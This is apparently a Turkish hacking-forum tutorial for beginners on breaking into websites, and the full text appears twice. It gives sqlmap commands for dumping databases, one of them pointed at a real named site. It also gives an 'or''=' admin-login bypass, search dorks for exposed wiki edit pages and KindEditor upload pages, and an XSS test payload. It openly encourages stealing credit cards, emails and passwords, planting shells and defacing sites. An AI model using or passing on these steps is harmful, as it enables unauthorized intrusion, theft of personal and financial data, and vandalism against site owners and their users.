DEV KONU - 1(ACEMİLER)
konu : site açıkları (acemi)
---------------------------------------------------------------------------------------------------
-SQL
hedef site : http://www.asfaa.org/members.php?id=1'a
https://resmim.net/f/MISUPd.png
database çekme : sqlmap.py -u hedefsite.com/index.php?id=1 --dbs
Not : bu database le işimiz yok tüm sitelerde var bu = information_schema
https://resmim.net/f/jeZoBV.png
tablo çekme : sqlmap.py -u hedefstie.com/index.php?id=1 -D database --tables
https://resmim.net/f/JN5Rzj.png
kolon çekme : sqlmap.py -u hedefsite.com/index.php?id=1 -D database -T seçtiğiniz_tablo --columns
https://resmim.net/f/ZXiBwr.png
en son işlem bilgi çekme : sqlmap.py u hedefsite.com/index.php?id=1 -D database -T seçtiğiniz_tablo -C seçtiğiniz_kolon --dump
https://resmim.net/f/5ztrwj.png
bu yöntemle neler yapılır :
kredi kartları
mailler
mail şifreler
username ve password (admin adı ve admin şifresiyle admin panele girip index ve shellinizi basıp zone kasarsınız )
daha çok şeyler yapılabilir...
---------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
-Admin Panel bypass
1- admin paneli buluyoruz bu dorkla
2- inurl : /admin/login.php
3- exploit : hem username hemde passworda 'or''=' yazınıs şansınız varsa girer
https://resmim.net/f/QstW2i.png
---------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
-waka wiki açığı
bence en kolay açık bu
açıkla neler yapılabilir kendi indexinizi yapıştırabilirsiniz
sizden tavsiyem waka wiki açıklı bir site bulursanız shell yapıştırın tamper data veya burp suite ile
dork : wakka.php?=wiki
exploit : sonuna /edit yazınıs
örnek : hedefsite.com/felanfilan/wakka.php?wiki=YesWiki/edit
https://resmim.net/f/bYL26v.png
---------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
-kineditor upload
hahaha bu açığı hala kullanan varmı bilmiyorum ama sonuçta buda bir açık
bu açıkla indexinizi yapıştırıyorsunuz shell atılırmı bilmiyorum hiç denemedim
dork : inurl /upload/kindeditor/examples/uploadbutton.html
html dosyamızı yükledikton sonra kutucukta link geliyor sitenin domain kısmına kadar silip yapıştırıyoruz
örnek : hedefsite.com/js/public/kineditor/uploadbottun.html
şu kısma kadar siliyoruz bir altta
hedefsite.com
ve sitenin verdiği url yi yapıştırıyoruz sitenin sonuna
örnek 2 :
hedefsite.com/sitenin_verdiği_url
oldu da bitti maşallah
https://resmim.net/f/ZivnMv.png
https://resmim.net/f/zvtad0.png
---------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
-XSS
bu açığın bir çok yöntemi var diğer konulardan bulabilirsiniz
ben en kolayını gösteriyorum
açık nasıl kullanılır :
sitede XSS açığını olduğunu düşünüyorsanız
arama kutucuklarına
mesaj gönder kısımlarında
kısacası yazı yazma yerlerinde olur
dork : inurl:"search.php?q="
nasıl anlicaz peki bu sitede xss açığı olduğunu :
sitenin arama kutusuna vb... yere
<script>alert("XSS")</script>
yazınıs eğer site ekranında XSS yazısı gelirse açık vardır
söylediğim gibi birçok yöntemi var bu açığın diğer konulardan bulabilirsiniz
https://resmim.net/f/u3gS44.png
---------------------------------------------------------------------------------------------------
konu : site açıkları (acemi)
---------------------------------------------------------------------------------------------------
-SQL
hedef site : http://www.asfaa.org/members.php?id=1'a
https://resmim.net/f/MISUPd.png
database çekme : sqlmap.py -u hedefsite.com/index.php?id=1 --dbs
Not : bu database le işimiz yok tüm sitelerde var bu = information_schema
https://resmim.net/f/jeZoBV.png
tablo çekme : sqlmap.py -u hedefstie.com/index.php?id=1 -D database --tables
https://resmim.net/f/JN5Rzj.png
kolon çekme : sqlmap.py -u hedefsite.com/index.php?id=1 -D database -T seçtiğiniz_tablo --columns
https://resmim.net/f/ZXiBwr.png
en son işlem bilgi çekme : sqlmap.py u hedefsite.com/index.php?id=1 -D database -T seçtiğiniz_tablo -C seçtiğiniz_kolon --dump
https://resmim.net/f/5ztrwj.png
bu yöntemle neler yapılır :
kredi kartları
mailler
mail şifreler
username ve password (admin adı ve admin şifresiyle admin panele girip index ve shellinizi basıp zone kasarsınız )
daha çok şeyler yapılabilir...
---------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
-Admin Panel bypass
1- admin paneli buluyoruz bu dorkla
2- inurl : /admin/login.php
3- exploit : hem username hemde passworda 'or''=' yazınıs şansınız varsa girer
https://resmim.net/f/QstW2i.png
---------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
-waka wiki açığı
bence en kolay açık bu
açıkla neler yapılabilir kendi indexinizi yapıştırabilirsiniz
sizden tavsiyem waka wiki açıklı bir site bulursanız shell yapıştırın tamper data veya burp suite ile
dork : wakka.php?=wiki
exploit : sonuna /edit yazınıs
örnek : hedefsite.com/felanfilan/wakka.php?wiki=YesWiki/edit
https://resmim.net/f/bYL26v.png
---------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
-kineditor upload
hahaha bu açığı hala kullanan varmı bilmiyorum ama sonuçta buda bir açık
bu açıkla indexinizi yapıştırıyorsunuz shell atılırmı bilmiyorum hiç denemedim
dork : inurl /upload/kindeditor/examples/uploadbutton.html
html dosyamızı yükledikton sonra kutucukta link geliyor sitenin domain kısmına kadar silip yapıştırıyoruz
örnek : hedefsite.com/js/public/kineditor/uploadbottun.html
şu kısma kadar siliyoruz bir altta
hedefsite.com
ve sitenin verdiği url yi yapıştırıyoruz sitenin sonuna
örnek 2 :
hedefsite.com/sitenin_verdiği_url
oldu da bitti maşallah
https://resmim.net/f/ZivnMv.png
https://resmim.net/f/zvtad0.png
---------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
-XSS
bu açığın bir çok yöntemi var diğer konulardan bulabilirsiniz
ben en kolayını gösteriyorum
açık nasıl kullanılır :
sitede XSS açığını olduğunu düşünüyorsanız
arama kutucuklarına
mesaj gönder kısımlarında
kısacası yazı yazma yerlerinde olur
dork : inurl:"search.php?q="
nasıl anlicaz peki bu sitede xss açığı olduğunu :
sitenin arama kutusuna vb... yere
<script>alert("XSS")</script>
yazınıs eğer site ekranında XSS yazısı gelirse açık vardır
söylediğim gibi birçok yöntemi var bu açığın diğer konulardan bulabilirsiniz
https://resmim.net/f/u3gS44.png
---------------------------------------------------------------------------------------------------